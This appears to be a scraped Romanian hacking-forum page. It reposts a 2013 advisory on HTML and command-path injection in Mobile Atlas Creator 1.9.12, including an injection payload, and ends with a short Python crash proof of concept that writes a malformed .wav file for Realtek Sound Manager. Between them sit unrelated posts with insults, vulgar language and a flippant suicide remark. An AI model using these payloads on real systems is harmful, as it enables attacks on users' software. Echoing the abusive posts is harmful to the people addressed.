Matt

Description : Mobile Atlas Creator version 1.9.12 suffers from a persistent command injection vulnerability. Author : Ateeq Khan Source : Mobile Atlas Creator 1.9.12 Command Injection ? Packet Storm Code : Title: ====== Mobile Atlas Creator 1.9.12 - Persistent Command Injection Vulnerability Date: ===== 2013-06-11 References: =========== http://www.vulnerability-lab.com/get_content.php?id=970 VL-ID: ===== 970 Common Vulnerability Scoring System: ==================================== 3.5 Introduction: ============= Mobile Atlas Creator (formerly known as TrekBuddy Atlas Creator) is an open source (GPL) program which creates offline atlases for GPS handhelds and cell phone applications like TrekBuddy, AndNav and other Android and WindowsCE based applications. For the full list of supported applications please see the features section. Additionally individual maps can be exported as one large PNG image with calibration MAP file for OziExplorer. As source for an offline atlas Mobile Atlas Creator can use a large number of different online maps such as OpenStreetMap and other online map providers. http://mobac.sourceforge.net/ http://mobac.sourceforge.net/MOBAC/CHANGELOG.txt Abstract: ========= The Vulnerability Laboratory Security Team discovered a persistent vulnerability & local command path inject bug in the Mobile Atlas Creator 1.9.12 (2116) software. Report-Timeline: ================ 2013-05-02: Researcher Notification & Coordination (Ateeq Khan) 2013-05-03: Vendor Notification (MOB - Developer Team) 2013-05-03: Vendor Response/Feedback (MOB - Developer Team) 2013-05-29: Vendor Fix/Patch (MOB - Developer Team) 2013-06-11: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== MOBAC Product: Mobile Atlas Creator 1.9.12 Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== Due to the fact that proper user input sanatization is not being performed, it is possible to inject user specified HTML code within the Atlas Mobile Creator Application. Besides HTML Injection, Local Command Path Injecton is also Possible. Other interesting behaviour includes that if you use <script>alert(1)</script> you will get an exception error and application will show you an error window. Upon further investigation, I was also able to load files from my local system where the application is installed. The bug exists in the Name FIeld while creating a New Atlas Map. A Malicious Attacker can save the script code as an Atlas Map file and send it to unknown victims. This surely makes this bug very interesting. Please also note, I was able to cause multiple types of exception errors while trying different payloads which means there is a possibility of multiple attack vectors through the same vulnerable name field. Vulnerable Module(s) [+] Create New Map Vulnerable Field(s) [+] Name Proof of Concept: ================= The vulnerability can be exploited by local attackers with low privilege system user account and low user interaction. For demonstration or reproduce ... Manually steps to reproduce ... 1) Install and open atlas software 2) In the menu, goto Atlas -> New Atlas 3) Use the following payload as the Atlas name >"<iframe src=http://www.vulnerability-lab.com 4) Click OK to save the input with the non-malicious test frame 5) Right click on the Atlas Content and click the Show Details menu button 6) The script code with the test frame will be executed in the main software when processing to load the show details function of the main listing module. Note: If you use <script>alert(1)</script> you will get an exception error and application will show you an error window.redisplay Solution: ========= Proper user input sanatization should be performed and all special / illegal characters should be filtered out to prevent any such / similar attacks. Risk: ===== The security risk of the persistent input validation vulnerabilities and local command path inject vulnerabilities are estimated as medium(+)|(-)high. Credits: ======== Vulnerability Laboratory [Research Team] - Ateeq Khan (khan@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com

Pana la si 30 sunt halite toate.

No.. mai bine intai ne punem toti userbarurile si apoi sa asteptam ca la loterie sa vedem care pica

Sper sa infundati puscaria.

There are currently 41 users browsing this thread. (36 members and 5 guests)

Pai cu muia aia cred si eu ca n-a intrat in bac.

In club se bea bere la cutie ? Sau ai venit cu ea de acasa ?

Are 2 facebookuri : ala si asta https://www.facebook.com/12wd1s?fref=ts

That's my boy.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) huiucracker - Tocmai esti favorit la nominalizarea " Prostul anului " Cum sa iti faci video de 10 minute cu un ecran negru ))))))))))))))))))))))))))))))))))))))) P E N I B I L @ ma duc sa ma sinucid.

Te poti duce la facultate si fara sa inveti. Ai planuri pentru tari straine ?

Ca tot s-a terminat bacul spuneti si unde vreti sa intrati la facultate ; shaggi , Gecko , Dragos ?

"ca tine am cu ziua la sapa" Asta ti-o poti pune la semnatura sa nu o repeti mereu.. Apoi daca tot vrei sa tii ceva tine-ma de pula.

Darkjmenar te rog sa te abtii de la a mai face comentarii asupra mea.Ai demonstrat cat esti de idiot.Nu iti ajunge? Pentru off-topic ai sectiune speciala , nu mai cauta anturaj cu mine ca n-am chef sa raspund la toti ratatii.

Posteaza si cu nick-ul tau real.

pwahwahwah trebuie sa incerc si eu asta

Daca nu te intereseaza , nu intri pe topic si punct.Nu trebui sa dai click din obligatie , nu te obliga nimeni , vrei sa dai , dai nu vrei sa dai nu dai.Care e problema? E topic special doar pentru cei ce ii intereseaza lucrul asta.

@The Time : Ii putem sesiza usor pe cei care intra doar ca sa isi posteze linkurile cu ref.Topic-ul poate fi moderat de catre o anumita persoana care sa stea cu ochii la ce se posteaza.Apoi bineinteles ca vor exista restrictii.Cei cu sub 50 post-uri n-au voie.N-ai voie sa iti postezi toate link-urile in post-uri diferite ci toate intr-unul. Solutii exista de eliminare a spammerilor insa daca plecam cu negativism de prima data nu facem treaba. //Structura unui post ar fi ceva de genul : Denumire : xxx Descriere : xxx si cu ce te ajuta pe tine ca iti intra cineva pe ref Link : Ref : link direct fara alte site-uri si briz briz-uri Daca ai mai multe site-uri de gen le postezi pe toate in acelasi post , unul sub altul de forma celui prezentat de mine.

Modelul ala nu a fost pus degeaba..

Ma gandeam ca ar fi nevoie sa fie creat un loc special unde userii sa isi posteze fiecare link-ul sau de referrals sau invitation code catre Dropbox , VPN , CIP , CPA , etc.Sa fie un topic undeva la off-topic unde fiecare sa isi scrie link-ul apoi sa dea o descriere catre ce duce acel link.Asa putem scuti userii sa isi mai puna link-urile de reff in link-urile de download si apoi si forumul.Sa existe si anumite restrictii ; userii care au sub 50 posturi nu au voie sa posteze si fara anumite site-uri gen adf.ly sau cum plm ii zice. Daca aveti vreo completare , postati insa in acelasi timp si votati. // Tot aici ar intra si urmatoarea situatie. Daca aveti un voucher si vreti sa il dati cuiva si nu aveti cui il puteti posta aici.La fel se poate intampla cu invitation code catre ( ex ) VPN unde pentru fiecare user invitat primesti 500 MB.

Nu te mai baga in fiecare topic de "Bine ati venit". Cei care scriu asa probabil ca respecta modelul pus aici. https://rstforums.com/forum/28420-interviu-bine-ati-venit.rst Daca tot ti-am dat link-ul citeste si tu si ai sa imi dai dreptate.

http://www.youtube.com/watch?v=0T5hvOXg1rI

Author : Asesino04 Source : Realtek Sound Manager AvRack (.wav) - Crash PoC Code : # !/usr/bin/python # Title: Realtek Sound Manager AvRack - Crach Poc # version: all versions # link: http://www.realtek.com.tw/ # Platform: Windows XP sp3 # Author: Asesino04 # Blog : http://asesino04.blogspot.com/ junk=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") file = open("Moviemaker.wav" , "w") file.write(junk) file.close()

Afacereataonline | Romtelecom Aici cred.

Mananci cacat.